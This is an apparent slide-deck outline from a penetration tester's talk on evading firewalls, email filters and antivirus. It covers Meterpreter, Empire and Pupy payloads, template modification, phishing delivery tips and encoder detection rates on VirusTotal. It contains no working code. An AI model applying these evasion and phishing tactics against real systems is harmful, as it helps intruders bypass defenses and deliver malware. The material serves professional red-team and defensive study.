This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
4. About
• 10+ years full time InfoSec
• Sr Consultant @ TrustedSec
• Specialties: Active Directory, Development (C#
Python PowerShell)
• Hobbies: Woodworking, Beekeeping, Fly Fishing
Jason Lang @curi0usJack
7. Inline Controls
• Defined: A network layer control that performs real-
time threat prevention
• Two biggest contenders: Palo Alto, Fortinet.
• My testing was performed with a fully licensed, up-to-
date Palo Alto, as well as a Cisco 5500 with FirePower
8. Meterpreter (stock)
Test Cases
Empire
Pupy Custom Meterpreter
•windows/x64/meterpreter/reverse_https
•Default certificate
•Port 443
•Empire 2.1
•Default Certificate
•Standard stager
•Port 443
•obfs3 transport
•Defaults
•Port 443
•Custom C# code
•Whatever I wanted
Victim Machines: Windows 7/10 x64.
Windows Defender
23. Inline Evasions
• Pay attention to Decryption/Detection patterns.
• Favor Empire/Pupy over MSF if you are getting
detected. Change all defaults.
• Change your template**.
• Hope you’re working with a Cisco firewall.
** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
24. Email Controls
• Defined: Anything that stops my phish from getting to
the inbox
• Examples: Proofpoint, Mimecast, Google spam filters
45. Email Workarounds
1. Obfuscate your payload (generally the most basic will do)
2. Set SPF/DKIM Records
3. Use links instead of attachments
4. mod_rewrite is your friend
5. Check the phish with isnotspam.com
6. Don’t trip threshold alerts. Send targeted phish slowly
47. Anti-Virus
• First things first thing’s first: Understand current state
• Test payloads against Virus Total
• Focused on the major players: Symantec, McAfee, Trend,
Windows Defender, Cylance
48. Anti-Virus
Type Template Args/Notes Detections Major Player
Binary (x86) No None 51/64 Yes
Binary (x64) No None 41/64 Yes
Binary (x64) Yes None 16/62 Yes
Binary (x64) Yes Custom C# 6/64 Yes (MS)
Binary (x64) Yes C#, -e xor -i 4 3/64 Yes (MS)
Binary (x64) Yes
C#, -e
zutto_dekiru
2/64 No
PowerShell No Unicorn 1/56 No
Binary (x64) Yes Ebowla 0/64 No
53. • AV Vendors are simply searching for strings
• Remove all comments
• Change function names / param names
• Concatenate your encoded commands
AV Evasion #2 - PowerShell